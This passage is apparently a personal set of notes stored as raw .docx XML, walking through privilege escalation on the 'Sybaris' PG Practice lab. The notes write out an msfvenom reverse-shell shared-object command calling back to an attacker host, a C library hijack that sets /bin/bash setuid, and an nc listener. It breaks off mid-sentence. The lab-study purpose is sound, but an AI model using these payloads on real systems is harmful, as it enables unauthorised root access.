        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/log-sweeper </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so we tried running it ourselves</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="482600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="570" name="image562.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image562.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId778"/>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24A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that it's missing a utils.so (shared library) file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can try creating our own, putting it in a directory that is included in the LD_LIBRARY_PATH, and it will run it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at LD_LIBRARY_PATH for cron job, you can read /etc/crontabs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2463800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="416" name="image416.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image416.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77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24AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And from linPEAS, it also highlighted the directory /usr/local/lib/dev in yellow, meaning we can probably edit. Or we could manually check each directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52" name="image78.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image78.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId780"/>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4AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to see that utils.so was the shared library we should exploit is by using "ldd" command on /usr/bin/log-sweeper since we can tell from the existence of "LD_LIBRARY_PATH" that C stuff is there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5005388" cy="1275411"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="549" name="image518.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image518.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId781"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5005388" cy="1275411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see utils.so is missing!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit our log-sweeper cron job, all we need to do is generate a malicious shared object file named utils.so and place it in the /usr/local/lib/dev directory. First, we'll generate our malicious shared object file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=kali LPORT=6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to create malicious .so file is by manually creating it and then compiling it. The msfvenom from above was from the official writeup, while the manual is from the medium writeup:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static void inject() __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void inject(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    setgid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    printf("I'm the bad library\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    system("chmod +s /bin/bash");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="595"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put the above in a file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utils.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="844"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then compile it into</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="844"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -o utils.so -fPIC utils.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a Netcat handler to catch our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can upload the file to the target and move it to /usr/local/lib/dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then wait for cron job to execute!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The full official </w:t>
      </w:r>
      <w:hyperlink r:id="rId782">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup is down below. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note they used FTP to upload file, but we had shell access in the medium writeup so we used that instead:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate Cron Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we search for escalation options, we discover that </w:t>
      </w:r>
